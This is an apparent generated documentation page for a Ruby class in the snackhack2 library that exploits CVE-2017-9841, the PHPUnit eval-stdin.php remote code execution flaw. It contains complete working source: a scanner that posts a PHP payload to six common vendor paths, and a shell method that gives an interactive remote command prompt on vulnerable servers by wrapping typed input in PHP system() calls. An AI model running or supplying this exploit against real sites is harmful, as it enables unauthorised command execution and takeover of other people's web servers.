Class: Snackhack2::CVE20179841

Inherits:
Object
  • Object
show all
Defined in:
lib/snackhack2/CVE-2017-9841.rb

Instance Attribute Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(site, payload: "<?php echo md5('phpunit_rce'); ?>") ⇒ CVE20179841

Returns a new instance of CVE20179841.



8
9
10
11
12
 
# File 'lib/snackhack2/CVE-2017-9841.rb', line 8

def initialize(site, payload: "<?php echo md5('phpunit_rce'); ?>")
  @site = site
  @payload = payload
  @vulnerable = false
end

Instance Attribute Details

#ipObject

Returns the value of attribute ip.



6
7
8
 
# File 'lib/snackhack2/CVE-2017-9841.rb', line 6

def ip
  @ip
end

Instance Method Details

#runObject 



14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
 
# File 'lib/snackhack2/CVE-2017-9841.rb', line 14

def run

  paths = ["yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]
  paths.each do |path|
  
    uri = URI.parse(File.join(@site, path))
    request = Net::HTTP::Post.new(uri)
    request.body = "#{@payload}"

    req_options = {
      use_ssl: uri.scheme == "https",
    }
    response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http|
      http.request(request)
    end
    # this is the MD5 Hhash of "phpunit_rce"
    if response.body.match("6dd70f16549456495373a337e6708865")
        @vulnerable = true
        puts "THIS SITE IS vulnerable!"
        return path
    else
      puts "The site is not vulnerable.... #{File.join(@site, path)}"
    end

  end
end

#shellObject 



45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
 
# File 'lib/snackhack2/CVE-2017-9841.rb', line 45

def shell
  # if vulnerable it passes the path
  path = self.run
  # makes sure the site is vulnerable if it 
  # is it will run a endless while loop
  if @vulnerable
    while true
        # takes input to run on the server
      
        print(">")
        input = gets.chomp
        if input.eql?("exit")
          exit
        else
          uri = URI.parse(File.join(@site, path))
          request = Net::HTTP::Post.new(uri)
          # takes the input ad run it on the host
          request.body = "<?php system('#{input}'); ?>"

          req_options = {
            use_ssl: uri.scheme == "https",
          }

          response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http|
            http.request(request)
          end
          puts response.body
        end
    end
  end 
end